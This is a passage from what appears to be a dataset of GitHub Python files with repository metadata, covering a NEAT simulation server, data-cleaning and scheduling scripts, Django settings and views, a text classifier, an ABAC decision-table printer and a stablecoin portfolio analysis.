\".\"\n )\n\n if parameter_filter:\n for key, value in parameter_filter.items():\n if key not in command.parameters.keys():\n self._respond_to_command(command, acknowledged=False)\n raise NetworkProtocolException(\"Filter key not in command parameters\")\n if not value == command.parameters[key]:\n self._respond_to_command(command, acknowledged=False)\n raise NetworkProtocolException(\"Filter values do not match in command parameters\")\n\n return command\n\n def _respond_to_command(\n self,\n command: BaseCommand,\n result: Dict[str, object]=None,\n acknowledged: bool=True,\n timeout: int=2000\n ) -> None:\n \"\"\"\n Sends the altered command object of a previously\n received command back to the client.\n The command object that is sent back to the client\n should always be the same object that had been received\n from the client.\n the results of the command execution are passed back to client\n inside the command.result dictionary. If this dictionary\n isn't present in the passed command, it will be created.\n All commands that're passed back to the client and that\n have been handled by the server contain an 'acknowledged'\n field inside results. If this is set to true, the command\n has been executed and the networking protocol hasn't been\n breached.\n :param command: The command object that is sent back\n to the client\n :param result: The result dictionary to be attached to\n the command before it's sent back\n :param acknowledged: Whether the command has been\n acknowledged by the server\n :param timeout: The timeout after which the send operation\n will fail if the client hasn't connected yet\n :return: None\n \"\"\"\n if result is None:\n result = dict({})\n command.result = result\n command.result[\"acknowledged\"] = acknowledged\n self._server.respond(command)\n\n def get_session(self) -> Dict[str, object]:\n \"\"\"\n Awaits the AnnounceSession command to be sent by the client.\n :return: The session parameters for the new simulation session\n \"\"\"\n session_command = self._listen_for_command(\"AnnounceSession\")\n self._respond_to_command(session_command)\n return session_command.parameters\n\n def send_block(\n self,\n block: List[StorageGenome],\n block_id: int\n ) -> None:\n \"\"\"\n Awaits the GetBlock command to be sent by the client\n and sends the block to the client.\n :param block: The List of StorageGenomes to be sent to the client\n :param block_id: The id (0 - block_count) of the block to be sent\n :return: None\n \"\"\"\n block_to_send = {\n genome.genome_id.__str__():\n {\n input_label: None\n for input_label in genome.inputs.keys()\n }\n for genome in block\n }\n result = {\n \"block\": block_to_send,\n \"block_id\": block_id,\n \"next_block_id\": block_id + 1,\n \"block_size\": len(list(block_to_send.keys()))\n }\n\n get_command = self._listen_for_command(\"GetBlock\", {\"block_id\": block_id})\n print(\"Sending block: \", result)\n self._respond_to_command(\n get_command,\n result\n )\n\n def get_block_inputs(\n self,\n block_id: int\n ) -> Dict[ObjectId, Dict[str, float]]:\n \"\"\"\n Awaits the SetInputs command to be sent by the client.\n :param block_id: The id of the block whose inputs\n should by received\n :return: The received inputs as Dictionary of\n genome_id: Dict[input_label: input_value]\n \"\"\"\n set_command = self._listen_for_command(\"SetInputs\", {\"block_id\": block_id})\n self._respond_to_command(copy.deepcopy(set_command))\n\n for key, value in set_command.parameters[\"block\"].items():\n del set_command.parameters[\"block\"][key]\n set_command.parameters[\"block\"][ObjectId(key)] = value\n\n return set_command.parameters[\"block\"]\n\n def send_block_outputs(\n self,\n outputs: Dict[ObjectId, Dict[str, float]],\n block_id: int\n ) -> None:\n \"\"\"\n Awaits the GetOutputs command to be sent by the client\n and sends the outputs for the previously received\n inputs back to the client.\n :param outputs: The output values as dictionary of\n genome_id: Dict[output_label: output_value]\n :param block_id: The od of the block whose inputs\n should be sent\n :return: None\n \"\"\"\n get_command = self._listen_for_command(\"GetOutputs\", {\"block_id\": block_id})\n\n for key, value in outputs.items():\n del outputs[key]\n outputs[key.__str__()] = value\n\n result = {\n \"outputs\": outputs\n }\n self._respond_to_command(get_command, result)\n\n def get_fitness_values(\n self,\n block_id: int\n ) -> Dict[ObjectId, float]:\n \"\"\"\n Awaits the SetFitnessValues command to be sent by the client.\n :param block_id: The id of the block whose fitness values\n should be received\n :return: The received fitness values as dictionary of\n genome_id: fitness_value\n \"\"\"\n set_command = self._listen_for_command(\n \"SetFitnessValues\",\n {\n \"block_id\": block_id\n }\n )\n self._respond_to_command(copy.deepcopy(set_command))\n for key, value in set_command.parameters[\"fitness_values\"].items():\n del set_command.parameters[\"fitness_values\"][key]\n set_command.parameters[\"fitness_values\"][ObjectId(key)] = value\n\n return set_command.parameters[\"fitness_values\"]\n\n def get_advance_generation(self) -> bool:\n \"\"\"\n Awaits the AdvanceGeneration command to be sent by the client.\n :return: A bool indicating whether the next generation should be\n calculated by NEAT (True) or the current session should be archived\n (False).\n \"\"\"\n advance_command = self._listen_for_command(\"AdvanceGeneration\")\n self._respond_to_command(advance_command)\n return advance_command.parameters[\"advance_generation\"]\n","repo_name":"strangedev/NEAT_PyGenetics","sub_path":"NEAT/Networking/Server/SimulationConnector.py","file_name":"SimulationConnector.py","file_ext":"py","file_size_in_byte":9116,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} +{"seq_id":"73386187672","text":"import csv\nimport sys\n\n\ntext = [line.strip().split(\"\\t\") for line in sys.stdin]\n\nheaders = [\"nomen\", \"definitio\", \"pluma\",\n \"Russian nomen\", \"familia\", \"Russian nomen familia\"]\n\nwith open(\"plantis.csv\", \"w\", encoding=\"utf-8\") as file:\n writer = csv.DictWriter(file, fieldnames=headers,\n delimiter=\";\", quotechar='\"')\n writer.writeheader()\n # print(text)\n for item in text:\n res = {}\n for i in range(len(item)):\n res[headers[i]] = item[i]\n\n writer.writerow(res)\n","repo_name":"QBoff/LearnQT","sub_path":"csv_lyceum/task6/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"3913582589","text":"import pandas as pd\nimport numpy as np\nimport xlrd\n#Parametros\n#Cantidad de cursos\nm = 62\n#Cantidad de clases\nc = 100\n\n##se leen los archivos y se crean los conjuntos como arreglos (listas de listas)\nroom = pd.read_excel('room.xls')\n#Arreglar columna days con 0 \nroom.loc[room['days'] == 100, 'day'] = \"0000100\"\nroom.loc[room['days'] == 1000, 'day'] = \"0001000\"\nroom.loc[room['days'] == 10000, 'day'] = \"0010000\"\nroom.loc[room['days'] == 100000, 'day'] = \"0100000\"\nroom.loc[room['days'] == 1000000, 'day'] = \"1000000\"\n#Aqui se borro la columna days y se cambio por day\nroom = room.drop(['days'], axis=1)\n#Conjunto de id de salas con su capacidad\nroom_id_cap = room.values[:, [True, True, False, False, False, False]]\nroom_id_cap = np.unique(room_id_cap)\n\n#Conjunto de Salas con toda la informacion\nrooms = room.to_numpy()\n\n#Cursos \ncourse = pd.read_excel('course.xls')\n#conjunto de toda la informacion de los cursos\ncourses = course.to_numpy()\n\n#Conjunto de cursos que no necesitan sala\ncourses_false = course[course.class_room == False]\ncourses_false = courses_false.drop(['room_id','room_penalty'], axis=1)\ncourses_true = course[(course['class_room'] != False)]\ncourses_true = courses_true.drop(['class_room'], axis = 1)\n\n#Arreglo de los cursos que no necesitan sala\ncourses_false = courses_false.to_numpy()\n\n#Abrir cursos_room\ncourses_room = pd.read_excel('cursos_room.xls')\n\n#Salas factibles para una clase c en diccionarios de la forma {1: [2,3,4]}\nsalas_factibles = dict()\nclass_limit = dict()\n\nclass_id = courses_room['class_id']\n\nclass_id = np.unique(class_id)\nfor x in class_id:\n salas_factibles[x] = []\n class_limit[x]= []\n \nfor i in courses_room.index:\n salas_factibles[courses_room['class_id'][i]].append(courses_room['room_id'][i])\n class_limit[courses_room['class_id'][i]].append(courses_room['class_limit'][i]) \n#Todas las salas factibles para un curso estan disponibles en \n#salas_factibles que es un diccionario\n\nprint(class_limit)\n#capacidad de cada clase\n\n\n\nhorario = course[course.course_id == 4]\n\n\n\n\n\n#Restricciones de Distribucion\ndistribution = pd.read_excel('distribucion.xls') \ndistributions = distribution.to_numpy()\n\n\n\n\n\n#Estudiantes los ocuparemos en segunda etapa\n#student = pd.read_excel('student_0.xls') \n#students = student.to_numpy()\n#Restricciones de Distribucion","repo_name":"fernandovegauc/capstone","sub_path":"python anteriores/conuntos.py","file_name":"conuntos.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"20888144514","text":"## Dictionary Summary\r\n## What is dictionary\r\n## Unorderd collection of data.\r\n\r\nd = {'name' : 'Siddhartha', 'age' : 20}\r\n\r\n## Or\r\n\r\nd1 = dict(name = 'Siddhartha', age = 20)\r\n\r\n## Or \r\n\r\nd2 = {\r\n 'name' : 'Siddhartha',\r\n 'age' : 20,\r\n 'fav_movies' : []\r\n}\r\n\r\n## How to access data from dictionary\r\n## You cannot do like \r\n## d[0], because there is no orderd inside dictionary.\r\n## Syntax\r\n# print(d['name'])\r\n\r\n## Add data inside empty dict\r\n\r\n# empty_dict = {}\r\n# empty_dict = ['key1'] = value1\r\n# empty_dict = ['key2'] = value2\r\n# print(empty_dict)\r\n\r\n## Cheak existance of values inside dict\r\n## Use in keyword to cheak for keys.\r\n\r\n# if 'name' in d:\r\n\r\n## How to iterate over dictionary \r\n## Most common method\r\n\r\n# for key, value in d.items():\r\n# print(f'key is {key} and value is {value}')\r\n \r\n## To print all keys\r\n# for i in d:\r\n# print(i)\r\n\r\n## To print all values\r\n# for i in d.values():\r\n# print(i)\r\n \r\n## Most common dict method. \r\n# get method \r\n# To access a key and check existance.\r\n\r\n# print(d.get('names'))\r\n\r\n## Q --> Why we use get\r\n## A --> To get of rid of error\r\n\r\n## Example\r\n\r\n# print(d['names'])\r\n# print(d.get('names'))\r\n\r\n## To delete item\r\n## Pop ----> Take one argument which is keyname\r\n\r\n# popped = d.pop('name')\r\n# print(popped)\r\n\r\n## Popitem\r\n\r\n# popped = d.popitem()\r\n# print(popped)\r\n# print(d)","repo_name":"sid2660/Python-totorial","sub_path":"Dictionary_summary.py","file_name":"Dictionary_summary.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"6733385843","text":"from .base import *\n\nDEBUG = False\n\n# Logging\nLOGGING = {\n \"version\": 1,\n \"disable_existing_loggers\": False,\n \"formatters\": {\n \"verbose\": {\n \"format\": \"{levelname} {asctime} {module} {process:d} {thread:d} {message}\",\n \"style\": \"{\",\n },\n },\n \"handlers\": {\n \"console\": {\n \"level\": os.getenv(\"DJANGO_LOG_LEVEL\", \"INFO\"),\n \"formatter\": \"verbose\",\n \"class\": \"logging.StreamHandler\",\n },\n },\n \"loggers\": {\n \"django\": {\n \"handlers\": [\"console\"],\n \"level\": os.getenv(\"DJANGO_LOG_LEVEL\", \"INFO\"),\n \"propagate\": True,\n },\n },\n}\n\n# allowed hosts\nALLOWED_HOSTS = [\"freeyeti.net\", \"www.freeyeti.net\"]\n\nFORCE_SCRIPT_NAME = \"/backend\"\nSTATIC_URL = \"/backend/static/\"\nMEDIA_URL = \"/backend/media/\"\n\nCSRF_TRUSTED_ORIGINS = [\n \"https://freeyeti.net\",\n \"https://www.freeyeti.net\",\n]\n\nCSRF_COOKIE_SECURE = True\nSESSION_COOKIE_SECURE = True\n\n# database optimized for production\nDATABASES = {\n \"default\": {\n \"ENGINE\": \"django.contrib.gis.db.backends.postgis\",\n \"NAME\": os.environ.get(\"DB_NAME\"),\n \"USER\": os.environ.get(\"DB_USER\"),\n \"PASSWORD\": os.environ.get(\"DB_PWD\"),\n \"HOST\": os.environ.get(\"DB_HOST\"),\n \"PORT\": os.environ.get(\"DB_PORT\"),\n \"TEST\": {\"NAME\": os.environ.get(\"TEST_DB_NAME\")},\n \"CONN_MAX_AGE\": 60,\n \"CONN_HEALTH_CHECKS\": True,\n }\n}\n\ntry:\n from .local import *\nexcept ImportError:\n pass\n","repo_name":"Jianxuan-Li/freeyeti-backend","sub_path":"app/settings/production.py","file_name":"production.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"11734730782","text":"import neattext.functions as nfx\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.metrics import accuracy_score\r\nimport joblib\r\n\r\n############ TRAINING ######################\r\ndef Model(df2):\r\n y = df2[['Bluetooth', 'VC-Settings', 'Volume']]\r\n corpus = df2['review'].apply(nfx.remove_stopwords)\r\n tfidf = TfidfVectorizer()\r\n Xfeatures = tfidf.fit_transform(corpus).toarray()\r\n X_train, X_test, y_train, y_test = train_test_split(Xfeatures, y, test_size=0.2, random_state=42)\r\n clf = RandomForestClassifier(n_estimators=100)\r\n clf.fit(X_train, y_train)\r\n fr_prediction = clf.predict(X_test)\r\n print(accuracy_score(y_test, fr_prediction))\r\n ######## saving model #####\r\n Random_Forest_clf_file = open(\"Random_Forest_clf_model_file.pkl\", \"wb\")\r\n joblib.dump(clf, Random_Forest_clf_file)\r\n Random_Forest_clf_file.close()\r\n ############ Saving Vectorizer #####\r\n # Save Vectorizer\r\n RF_tfidf_vectorizer_file = open(\"RF_tfidf_vectorizer.pkl\", \"wb\")\r\n joblib.dump(tfidf, RF_tfidf_vectorizer_file)\r\n RF_tfidf_vectorizer_file.close()\r\n\r\n################# PREDICTION###########\r\ndef Predict(df2):\r\n model = joblib.load('Random_Forest_clf_model_file.pkl')\r\n tfidf_model = joblib.load('RF_tfidf_vectorizer.pkl')\r\n vec_example = tfidf_model.transform(df2['review'])\r\n pre = model.predict(vec_example)\r\n df2[\"Bluetooth\"] = pre[:, 0]\r\n df2[\"VC-Settings\"] = pre[:, 1]\r\n df2[\"Volume\"] = pre[:, 2]\r\n return df2\r\n\r\n","repo_name":"kaleemrehman/MultiLabel-text-classification-Pycharm","sub_path":"RF_Model.py","file_name":"RF_Model.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"43345235419","text":"import sys\n\n\n\ndef main(args=None):\n if args is None:\n args = sys.argv[1:]\n\n print(\"Import dictiorm in your project to start using your database \\\n documents and collections like simple dictionaries.\")\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"bmpenuelas/dictiORM","sub_path":"dictiorm/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"36777482146","text":"#coding: utf-8\n\nimport socket\nfrom sacricat.log import logging\n\n\nclass Core:\n \"\"\" Abstract class to define core functions\"\"\"\n length_bytes = 128\n def __init__(self, ip, port, prompt, logLevel=logging.BASIC):\n self.ip = ip\n self.port = port\n self.prompt = prompt\n self.socket = None\n self.logLevel = logLevel\n self.logger = logging.getLogger()\n self.logger.setLevel(self.logLevel)\n\n def _log(self, log, heading=True, level=logging.BASIC):\n if heading:\n log = \"[*] %s:%s - \" % (self.ip, self.port) + log\n self.logger.log(level,log)\n\n def _logConnected(self, msg=''):\n log = \"[+] %s:%s - Connected\" % (self.ip, self.port)\n if msg:\n log += \" - \" + msg\n self._log(log, heading=False)\n\n def _logDisconnected(self, msg=''):\n log = \"[-] %s:%s - Disconnected\" % (self.ip, self.port)\n if msg:\n log += \" - \" + msg\n self._log(log, heading=False)\n\n def close(self):\n res = self.socket.close()\n self._logDisconnected()\n return res\n\n def recv(self, length=None, recv_bytes = None, encoding='latin-1'):\n if not length:\n length = self.length_bytes\n if length < 1:\n raise Exception(\"Length < 1\")\n r = self.socket.recv(length)\n if recv_bytes is None:\n recv_bytes = self.recv_bytes \n if not recv_bytes:\n r = r.decode(encoding)\n self._log(\"Received - \"+repr(r), level=logging.RECV)\n return r\n\n def send(self, msg, sendPrompt=False):\n if type(msg) == str:\n if sendPrompt:\n msg += '\\n'+self.prompt\n msg = msg.encode()\n try:\n self.socket.sendall(msg)\n except socket.error as e:\n self._log(\"Socket Error - \"+str(e), level=logging.ERROR)\n return False\n else:\n self._log(\"Sent - \"+repr(msg), level=logging.SENT)\n return True","repo_name":"Sacriyana/SacriCat","sub_path":"sacricat/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"26134244386","text":"######################################################\n#### Stablecoin with minimum volatility weightings ###\n######################################################\n\nimport datetime as dt\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom engine import data_cleaning\nfrom engine.generic_functions import resample\n\nfrom engine.portfolio_functions import simulated_ef\nfrom engine import portfolio_functions\n\n#Constant parameters\nstart_date = dt.datetime(2019,7,1)\nend_date = dt.datetime(2019,12,1)\nnum_assets = 5\nnum_portfolios = 1000\nrisk_free_rate = 0.02\n\n#Find list of 10 largest symbols by period over period given by start_date and end_date\nselected_symbols = data_cleaning.universe_selection_on_volume(num_assets, start_date, end_date)\n\n#Create dataframe of close prices\nclose_prices = data_cleaning.df_make('close', selected_symbols, start_date, end_date)\n\n#Create returns matrix\nclose_prices = close_prices.resample('D').mean()\nreturns = close_prices.pct_change()\nmean_returns = returns.mean()\ncov_matrix = returns.cov()\n\n\n#Get weights that minimize variance\nsimulated_ef(close_prices, num_assets, mean_returns, cov_matrix, num_portfolios, risk_free_rate)\nmin_vol_allocation = simulated_ef(close_prices, num_assets, mean_returns, cov_matrix, num_portfolios, risk_free_rate)\nmin_vol_allocation = min_vol_allocation.div(min_vol_allocation.sum(axis=1), axis=0)\n\n#Confirm with scipy computation\nresult = portfolio_functions.find_min_variance_basket(mean_returns, cov_matrix)\n#Extract array of weights\nanalytical_weights = list(result['x'])\nanalytical_weights_df = pd.DataFrame([analytical_weights], columns=selected_symbols)\n\n#Compute stablecoin and plot for weights defined through simulation\nstablecoin_random_weights = pd.DataFrame()\nfor symbol in selected_symbols:\n\tweight = min_vol_allocation[[symbol]].values[0][0]\n\tprint(weight)\n\tweighted_col = returns[[symbol]]*weight\n\tprint(weighted_col)\n\tstablecoin_random_weights = pd.concat([stablecoin_random_weights, weighted_col], axis=1, sort=False)\n\nstablecoin_random_weights_volatility = stablecoin_random_weights.sum(axis=1)\n\n#Plot for equal weights\nequal_weighted_returns_volatility = returns.mean(axis=1)\n\n#Plot for analytical weights \nstablecoin_analytical_weights = pd.DataFrame()\nfor symbol in selected_symbols:\n\tweight = analytical_weights_df[[symbol]].values[0][0]\n\tprint(weight)\n\tweighted_col = returns[[symbol]]*weight\n\tprint(weighted_col)\n\tstablecoin_analytical_weights = pd.concat([stablecoin_analytical_weights, weighted_col], axis=1, sort=False)\n\nstablecoin_analytical_weights_volatility = stablecoin_analytical_weights.sum(axis=1)\n\nfig, ax = plt.subplots()\nmaster_df = pd.concat([equal_weighted_returns_volatility, stablecoin_random_weights_volatility, stablecoin_analytical_weights_volatility], axis = 1, sort = False)\nmaster_df = master_df.rename(columns={0: 'equal_weights', 1:'random_weights', 2: 'analytical_weights'})\nmaster_df.plot(ax=ax)\nax.set_ylabel('Volatility', fontsize = 16)\nax.tick_params(axis='both', which='major', labelsize=16)\nplt.title('Comparing different weights on a currency basket ', fontsize = 16)\nax.legend()\nplt.show()","repo_name":"fsxforte/stablecoin","sub_path":"scripts/stablecoin.py","file_name":"stablecoin.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"31532089748","text":"from django.views.generic import CreateView, ListView, UpdateView, DeleteView\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom apps.topologia.sectores.models import Sector\nfrom django.views.generic.edit import FormView\nfrom apps.topologia.sectores.forms import SectorForm\nfrom apps.topologia.estados.models import Estado\nfrom apps.topologia.municipios.models import Municipio\nfrom apps.topologia.parroquias.models import Parroquia\nfrom apps.topologia.poligonales.models import Poligonal\nfrom django.contrib.auth.decorators import login_required\nfrom django.core import serializers\n\n\n@login_required(login_url='/')\ndef RegistrarSector(request):\n \"\"\" Vista basada en Metodos o funciones: (`Registrar`) \"\"\"\n list_estado = Estado.objects.all()\n if request.method == 'POST':\n bandera = request.POST.get('bandera')\n estado = request.POST.get('estado')\n cod_s = request.POST.get('cod_s')\n sector = request.POST.get('sector')\n existe = Sector.objects.filter(estado=estado, cod_s=cod_s).exists()\n existe_t = Sector.objects.filter(estado=estado, cod_s=cod_s, sector=sector).exists()\n if existe_t and bandera == 'true':\n return HttpResponse('existe_t')\n elif existe and bandera == 'true':\n return HttpResponse('existe')\n else:\n form_reg_sector = SectorForm(request.POST, request.FILES)\n if form_reg_sector.is_valid():\n new_reg_sector = form_reg_sector.save(commit=False)\n new_reg_sector.save()\n return HttpResponseRedirect('/configuraciones/topologia/sectores/')\n else:\n form_reg_sector = SectorForm()\n ctx = {'form_reg_sector': form_reg_sector, 'list_estado': list_estado}\n return render_to_response('topologia/sectores/sectores.html',\n ctx, context_instance=RequestContext(request))\n\n\n@login_required(login_url='/')\ndef ActualizarSector(request, pk):\n \"\"\" Vista basada en Metodos o funciones: (`modificar`) \"\"\"\n obj_reg_sec = Sector.objects.get(id=pk)\n list_estado = Estado.objects.all()\n list_mun = Municipio.objects.filter(estado_id=obj_reg_sec.estado_id)\n list_par = Parroquia.objects.filter(estado_id=obj_reg_sec.estado_id, municipio=obj_reg_sec.municipio)\n\n if request.method == 'POST':\n obj_reg_edit_sec = SectorForm(request.POST, request.FILES, instance=obj_reg_sec)\n if obj_reg_edit_sec.is_valid():\n new_reg_sector = obj_reg_edit_sec.save(commit=False)\n new_reg_sector.user = request.user.username\n new_reg_sector.save()\n return HttpResponseRedirect('/configuraciones/topologia/sectores/')\n else:\n obj_reg_edit_sec = SectorForm(instance=obj_reg_sec)\n ctx = {'obj_reg_edit_sec': obj_reg_edit_sec, 'obj_reg_sec': obj_reg_sec,\n 'list_estado': list_estado, 'list_mun': list_mun, 'list_par': list_par} # ctx = Contexto\n return render_to_response('topologia/sectores/modificar.html', ctx,\n context_instance=RequestContext(request))\n\n\nclass ListarSector(ListView):\n \"\"\" Vista basada en clase: (`Listar`)\n\n :param template_name: ruta de la plantilla\n :param model: Modelo al cual se hace referencia\n :param context_object_name: nombre del objeto que contiene esta vista\n \"\"\"\n model = Sector\n template_name = 'topologia/sectores/listar.html'\n context_object_name = \"listar_sectores\"\n\n\n def get_context_data(self, **kwargs):\n # Llamamos ala implementacion para traer un primer context\n context = super(ListarSector, self).get_context_data(**kwargs)\n # Agregamos un QuerySet\n context['list_m'] = Municipio.objects.all()\n context['list_p'] = Parroquia.objects.all()\n return context\n\n\nclass BorrarSector(DeleteView):\n \"\"\" Vista basada en clase: (`Borrar`)\n\n :param template_name: ruta de la plantilla\n :param model: Modelo al cual se hace referencia\n :param success_url: nombre de la ruta a la cual se redireccionara la aplicacion una vez eliminado el registro\n satisfactoriamente\n :param context_object_name: nombre del objeto que contiene esta vista\n \"\"\"\n model = Sector\n template_name = 'topologia/sectores/borrar.html'\n context_object_name = \"borrar_sector\"\n success_url = reverse_lazy(\"listar_sectores\")\n\n def get_context_data(self, **kwargs):\n context = super(BorrarSector, self).get_context_data(**kwargs)\n pk_sec = self.kwargs['pk']\n sector = Sector.objects.all()\n id_sec = sector.filter(pk=pk_sec).values('cod_s')\n id_par = sector.filter(pk=pk_sec).values('parroquia')\n id_mun = sector.filter(pk=pk_sec).values('municipio')\n id_est = sector.filter(pk=pk_sec).values('estado_id')\n\n pol = Poligonal.objects.all()\n existe = pol.filter(sector =id_sec ,parroquia=id_par, municipio=id_mun, estado_id=id_est)\n cantidad = len(existe)\n\n context['cantidad'] = cantidad\n\n return context\n","repo_name":"desarrollosimagos/exit_poll","sub_path":"apps/topologia/sectores/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5154,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"32500164170","text":"\"\"\"\nPrint decision algorithm combination for documentation\n\"\"\"\n\nfrom abac.const import DENY, PERMIT, NOT_APPLICABLE, INDETERMINATE\nfrom abac.algorithm import (\n permit_unless_deny,\n deny_unless_permit,\n permit_overrides,\n deny_overrides\n)\n\nDECISIONS = [PERMIT, DENY, NOT_APPLICABLE, INDETERMINATE]\nBOLD = '**'\nNORMAL = ''\nRED = ''\nGREEN = ''\nBLUE = ''\nWHITE = ''\n\nstr_color = '{color}{decision}{normal}'\n\nCOLOR_DECISIONS = {\n PERMIT: str_color.format(\n color=GREEN,\n decision=PERMIT,\n normal=NORMAL,\n ),\n DENY: str_color.format(\n color=RED,\n decision=DENY,\n normal=NORMAL,\n ),\n NOT_APPLICABLE: str_color.format(\n color=WHITE,\n decision=NOT_APPLICABLE,\n normal=NORMAL,\n ),\n INDETERMINATE: str_color.format(\n color=BLUE,\n decision=INDETERMINATE,\n normal=NORMAL,\n ),\n}\n\nLENGTH = 21\nCOLOR_LENGTH = 30\nCOUNT_COLUMN = len(DECISIONS)\n\nstr_row = '|' + '{:^{length}} |'*(COUNT_COLUMN+1)\nstr_color_row = '|' + '{:^{length}} |' + '{:^{color_length}} |'*COUNT_COLUMN\nstr_line = '|' + ('-'*(LENGTH + 1) + '|')*(COUNT_COLUMN + 1)\n\n\ndef print_decision_combination(alg):\n print('### ' + alg.__name__.upper())\n print()\n print(str_row.format('', *DECISIONS, length=LENGTH))\n print(str_line)\n for decision in DECISIONS:\n print(str_color_row.format(\n '**{}**'.format(decision),\n *[COLOR_DECISIONS[alg([decision, d])] for d in DECISIONS],\n length=LENGTH,\n color_length=COLOR_LENGTH\n ))\n print()\n\n\nALGS = [\n permit_unless_deny,\n deny_unless_permit,\n permit_overrides,\n deny_overrides\n]\n\nfor alg in ALGS:\n print_decision_combination(alg)\n\n","repo_name":"Weltraum/django-abac","sub_path":"abac/_development/plot_algorithm_combination.py","file_name":"plot_algorithm_combination.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"5"} +{"seq_id":"28302591331","text":"import re\nimport os\nimport sys\nimport json\nimport string\nimport warnings\nimport pendulum\nimport numpy as np\n\nfrom copy import deepcopy\nfrom bs4 import BeautifulSoup, MarkupResemblesLocatorWarning\nfrom nltk.corpus import stopwords\n\nwarnings.filterwarnings(\n 'ignore', category=MarkupResemblesLocatorWarning, module='bs4')\n\nwith open('../config/ignore_words.json', 'r') as ig:\n ignore_words = json.load(ig)\n\n\ndef convert_html_tags(cv_text):\n cv_list = cv_text.split(' ')\n goodwords = ''\n for cword in cv_list:\n tt = BeautifulSoup(cword, 'html.parser')\n BeautifulSoup()\n goodwords = goodwords + ' ' + str(tt)\n return (goodwords)\n\n\ndef fix_ts(dt_stamp):\n ts = pendulum.parse(str(dt_stamp)).to_rfc3339_string()\n return (str(ts))\n\n\ndef lcase_email(str_text):\n tmp_emails = []\n if type(str_text) == str:\n return (str_text.lower())\n else:\n for lce in str_text:\n tmp_emails.append(str(lce).lower())\n return (tmp_emails)\n\n\ndef find_urls(body_txt):\n urls = re.findall(\n 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', body_txt)\n return (urls)\n\n\ndef clean_body(body_txt, bodytype='body'):\n body_txt = convert_html_tags(body_txt)\n body_txt = remove_punct(body_txt)\n body_txt = body_txt.replace('\\n', ' ')\n body_txt = body_txt.replace('\\r', ' ').lower()\n body_txt = body_txt.replace(' zwnj ', ' ')\n body_txt = body_txt.replace('’', '')\n\n urls = find_urls(body_txt) # remove urls, those are seperate field\n for url in urls:\n body_txt = body_txt.replace(url, ' ')\n\n body_list = body_txt.split()\n body_list = unique_words(body_list)\n body_copy = deepcopy(body_list)\n for each_word in body_copy:\n if each_word in body_list:\n each_word == make_ascii(each_word)\n if len(each_word) <= 2 or len(each_word) >= 20:\n body_list.remove(each_word)\n continue\n\n if each_word in stopwords.words('english'):\n body_list.remove(each_word)\n\n if each_word in ignore_words:\n body_list.remove(each_word)\n\n body_copy.clear()\n\n if len(body_list) <= 10 and bodytype == 'body':\n return None\n\n if len(body_list) <= 3 and bodytype == 'subject':\n return None\n\n body_txt = ' '.join(body_list)\n body_txt = ' '.join(body_txt.split()).lstrip()\n return (body_txt)\n\n\ndef unique_words(word_list):\n tmp_list = []\n for thatword in word_list:\n if thatword not in tmp_list:\n tmp_list.append(thatword)\n\n return (tmp_list)\n\n\ndef make_ascii(to_text):\n str_en = to_text.encode('ascii', 'ignore')\n return (str_en.decode())\n\n\ndef remove_punct(rptext):\n rptext = str(rptext).replace('.', ' ')\n rptext = rptext.translate(str.maketrans('', '', string.punctuation))\n return (rptext)\n\ndef merge_account_emails(acct_files):\n for user_id, ufiles in acct_files.items():\n msg_db = []\n clean_files = []\n for ifile in ufiles:\n print('opening file ' + ifile)\n clean_files.append(ifile)\n with open(ifile, 'r') as infile:\n msg_import = json.load(infile)\n msg_db.extend(msg_import)\n \n for rmfile in clean_files:\n print('removing ' + rmfile)\n os.remove(rmfile)\n return(msg_db)","repo_name":"mobjack/musubihero","sub_path":"bin/email_corrector.py","file_name":"email_corrector.py","file_ext":"py","file_size_in_byte":3376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"11865080019","text":"\"\"\"\nImplements blockmatching algorithm in OpenCV.\n\"\"\"\n\n# pylint: disable=no-member\nimport json\nimport argparse\nimport tempfile\n#import logging\n\nimport magic\nimport cv2\nimport numpy as np\nfrom constants import Engines,MIME\n\nPOINT_ARRAY_OUT='point_array_out'\nRED = (0, 0, 255)\nBLACK = (0,0,0)\nTEXT_FACE = cv2.FONT_HERSHEY_DUPLEX\nTEXT_SCALE = 0.75\nTEXT_THICKNESS = 2\nTEXT_MARGIN = 5\n\n## JPEG support\n\nclass ConversionError(RuntimeError):\n \"\"\"Special error\"\"\"\n def __init__(self,msg):\n 